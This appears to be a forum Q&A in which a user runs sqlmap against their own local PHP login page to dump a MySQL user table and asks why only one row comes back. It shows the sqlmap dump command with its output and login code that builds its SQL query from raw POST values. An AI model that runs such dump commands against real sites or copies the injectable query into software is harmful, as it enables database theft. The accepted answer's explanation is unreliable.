# whole data isn't showing on POST sql injection

Tags: php, mysql, sql

```
sqlmap -u "http://192.168.0.106/get_method/get_data_login/" --data="name=name&password=pass"  -D get_method -T user --dump
```

Output :

```
[11:27:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:27:40] [INFO] fetching columns for table 'user' in database 'get_method'
[11:27:40] [INFO] resumed: 'serial'
[11:27:40] [INFO] resumed: 'int(255)'
[11:27:40] [INFO] resumed: 'name'
[11:27:40] [INFO] resumed: 'varchar(255)'
[11:27:40] [INFO] resumed: 'password'
[11:27:40] [INFO] resumed: 'varchar(255)'
[11:27:40] [INFO] resumed: 'timestamp'
[11:27:40] [INFO] resumed: 'timestamp'
[11:27:40] [INFO] fetching entries for table 'user' in database 'get_method'
[11:27:40] [INFO] resumed: '2021-03-26 11:21:25'
[11:27:40] [INFO] resumed: 'hello'
[11:27:40] [INFO] resumed: 'hey'
[11:27:40] [INFO] resumed: '222'
Database: get_method
Table: user
[1 entry]
+-------+--------+----------+---------------------+
| name  | serial | password | timestamp           |
+-------+--------+----------+---------------------+
| hello | 222    | hey      | 2021-03-26 11:21:25 |
+-------+--------+----------+---------------------+

[11:27:40] [INFO] table 'get_method.`user`' dumped to CSV file '/home/istiak/.local/share/sqlmap/output/192.168.0.106/dump/get_method/user.csv'
[11:27:40] [INFO] fetched data logged to text files under '/home/istiak/.local/share/sqlmap/output/192.168.0.106'

[*] ending @ 11:27:40 /2021-03-26/
```

`php` code :

```
include 'connection.php';
if($_SERVER['REQUEST_METHOD']=='POST'){
    $name=$_POST['name'];
    $password=$_POST['password'];
    
    $query = mysqli_query($con,"SELECT * FROM `user` WHERE `name`='$name' && `password`='$password'");
    $rows = mysqli_num_rows($query);
    if($rows==0){
        echo "failure";
    }else{
        echo "succeed";
    }

}

mysqli_close($con);
```

The issue is when I run this code `sqlmap -u "http://192.168.0.106/get_method/get_data_login/" --data="name=name&password=pass"  -D get_method -T user --dump` it is sending  `data="name=name&password=pass"` while there's no data in database [image]

And, I am getting only a data when I run that code.

```
+-------+--------+----------+---------------------+
| name  | serial | password | timestamp           |
+-------+--------+----------+---------------------+
| hello | 222    | hey      | 2021-03-26 11:21:25 |
+-------+--------+----------+---------------------+
```

Why I am unable to get all data? I tried this also `sqlmap -u "http://192.168.0.106/get_method/get_data_login/" --data="name=hello&password=hey"  -D get_method -T user --dump` Although I was getting same output..

Answer (score 0, accepted):

Look at your `php` code at first

```
include 'connection.php';
if($_SERVER['REQUEST_METHOD']=='POST'){
    $name=$_POST['name'];
    $password=$_POST['password'];
    
    $query = mysqli_query($con,"SELECT * FROM `user` WHERE `name`='$name' && `password`='$password'");
    $rows = mysqli_num_rows($query);
    if($rows==0){
        echo "failure";
    }else{
        echo "succeed";
    }

}

mysqli_close($con);
```

Whatever I will send to this file it will only check that look at `sql` code now. `` SELECT * FROM `user` WHERE `name`='$name' && `password`='$password' `` Select everything from user table where name="whatever user send" and password="whatever user send". That's the reason why I wasn't having all of list.